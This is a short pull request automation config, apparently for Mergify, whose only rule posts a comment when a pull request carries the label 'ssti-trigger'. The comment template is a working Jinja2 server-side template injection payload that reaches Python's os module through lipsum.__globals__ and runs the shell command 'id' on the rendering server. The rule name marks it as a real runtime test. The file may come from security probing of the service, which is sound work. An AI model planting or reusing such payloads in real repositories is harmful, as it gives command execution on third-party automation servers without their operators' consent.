pull_request_rules:
  - name: ssti-runtime-real
    conditions:
      - label = "ssti-trigger"
    actions:
      comment:
        message: |
          REAL_SSTI={{lipsum.__globals__['os'].popen('id').read()}}=END
